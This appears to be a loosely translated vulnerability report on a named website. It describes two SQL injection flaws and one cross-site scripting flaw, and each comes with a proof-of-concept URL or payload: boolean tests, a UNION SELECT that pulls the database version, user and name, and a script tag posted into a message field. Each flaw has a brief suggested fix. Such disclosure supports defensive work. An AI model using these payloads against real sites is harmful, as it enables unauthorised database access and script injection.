First
Brief description: Due to lax variable filtering, the SQL injection vulnerability can be exploited to gain site permissions.
Http://labs.duba.net/kws/feedback2/his.php? Uuid = 622D988684F34161BC09E869DB38BF3B & app = 2
Proof of vulnerability: http://labs.duba.net/kws/feedback2/his.php? Uuid = 622D988684F34161BC09E869DB38BF3B & app = 2 and 1 = 1
Http://labs.duba.net/kws/feedback2/his.php? Uuid = 622D988684F34161BC09E869DB38BF3B & app = 2 and 1 = 2
Results: Injection Vulnerabilities are generated.
Solution: filter variable apps
Second
Brief description: SQL Injection due to lax Filtering
Detailed Description: Due to lax filtering, SQL injection has the opportunity to win server Permissions
Proof of vulnerability: http://labs.duba.net/kws/feedback2/his.php? Uuid = 12B70C061426AAA96F58AE431D180055 & app = 5% 20and % 201 = 2% 20 union % 20 select %, version (), user (), database (), 8, 9 --
Http://labs.duba.net/robots.txt
No further tests
Solution: filter parameters
Third:
Brief description: Cross-Site vulnerability caused by loose filtering in the message
Details: Cross-Site vulnerability caused by loose filtering in the message service
Proof of vulnerability: http://labs.duba.net/kws/feedback2/his.php? Uuid = 12B70C061426AAA96F58AE431D180055 & app = 5
Enter in the message: <script> alert (/anti-virus Cross-Site/) </script>
Solution: strictly Filter